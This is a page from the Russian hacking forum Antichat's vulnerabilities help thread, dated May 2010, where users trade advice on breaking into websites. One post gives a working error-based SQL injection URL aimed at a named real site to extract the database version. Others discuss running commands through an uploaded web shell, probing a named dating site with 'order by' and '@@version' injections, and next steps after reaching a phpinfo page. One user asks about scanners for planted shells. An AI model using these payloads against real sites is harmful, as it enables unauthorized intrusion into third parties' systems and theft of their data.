ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1291 из 1393 « Первая < 291791119112411281 1287 1288 1289 1290 1291 1292 1293 1294 1295 130113411391 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12901  
Старый 04.05.2010, 17:29
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
Цитата:
Сообщение от Twoster  
Потом http://site.com/files/shell.php?var=phpinfo();
Да phpinfo то выводит без проблем!!
П ричем var не работает, только cmd!

И что ещо можно сделать через команду cmd ??
Последний раз редактировалось GOGA075; 04.05.2010 в 20:03..
 
Ответить с цитированием

  #12902  
Старый 04.05.2010, 20:39
Аватар для daniel_1024
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
 
Ответить с цитированием

  #12903  
Старый 04.05.2010, 20:44
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от daniel_1024  
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
ммм.. а как скрипт будет различать опасные файлы по твоему?

он же работает на стороне клиента..исходники ему не видны
 
Ответить с цитированием

  #12904  
Старый 04.05.2010, 21:07
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от daniel_1024  
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд).

Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093
Последний раз редактировалось Redwood; 04.05.2010 в 21:18..
 
Ответить с цитированием

  #12905  
Старый 05.05.2010, 12:57
Аватар для oko
oko
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737

Репутация: -5
По умолчанию
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
Последний раз редактировалось oko; 05.05.2010 в 13:02..
 
Ответить с цитированием

  #12906  
Старый 05.05.2010, 13:08
Аватар для gromoza
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию
Цитата:
Сообщение от oko  
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
простое phpinfo тебе ничего особо полезного не даст.
 
Ответить с цитированием

  #12907  
Старый 05.05.2010, 16:00
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию
Не смог раскрутить. Кто что скажет?
Код:
chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1
 
Ответить с цитированием

  #12908  
Старый 05.05.2010, 16:03
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
 
Ответить с цитированием

  #12909  
Старый 05.05.2010, 18:41
Аватар для durito
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
 
Ответить с цитированием

  #12910  
Старый 05.05.2010, 19:09
Аватар для b82a
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию
Цитата:
Сообщение от durito  
что-то фантазии не хвататет:

http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
 
Ответить с цитированием
Ответ
Страница 1291 из 1393 « Первая < 291791119112411281 1287 1288 1289 1290 1291 1292 1293 1294 1295 130113411391 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ